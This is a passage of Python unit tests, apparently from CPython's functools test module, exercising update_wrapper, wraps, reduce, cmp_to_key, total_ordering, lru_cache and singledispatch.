self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduce(unittest.TestCase):
if c_functools:
func = c_functools.reduce
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.func(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.func(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.func(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.func(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.func(add, Squares(10)), 285)
self.assertEqual(self.func(add, Squares(10), 0), 285)
self.assertEqual(self.func(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.func)
self.assertRaises(TypeError, self.func, 42, 42)
self.assertRaises(TypeError, self.func, 42, 42, 42)
self.assertEqual(self.func(42, "1"), "1") # func is never called with one item
self.assertEqual(self.func(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.func, 42, (42, 42))
self.assertRaises(TypeError, self.func, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.func, add, "")
self.assertRaises(TypeError, self.func, add, ())
self.assertRaises(TypeError, self.func, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.func, add, TestFailingIter())
self.assertEqual(self.func(add, [], None), None)
self.assertEqual(self.func(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.func, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.func(add, SequenceClass(5)), 10)
self.assertEqual(self.func(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.func, add, SequenceClass(0))
self.assertEqual(self.func(add, SequenceClass(0), 42), 42)
self.assertEqual(self.func(add, SequenceClass(1)), 0)
self.assertEqual(self.func(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.func(add, d), "".join(d.keys()))
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_reentrancy_with_len(self):
# Test to make sure the LRU cache code isn't thrown off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
old_len = builtins.len
try:
builtins.len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
builtins.len = old_len
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=-10, currsize=1))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with support.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
# XXX: Why can these be unequal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with support.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with support.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with support.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_early_detection_of_bad_call(self):
# Issue #22184
with self.assertRaises(TypeError):
@functools.lru_cache
def f():
pass
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, c.OrderedDict]
for haystack in permutations(bases):
m = mro(c.ChainMap, haystack)
self.assertEqual(m, [c.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(c.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [c.defaultdict, dict, c.Sized, c.Container,
object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(c.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
c.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(c.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, c.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections
d = {"a": "b"}
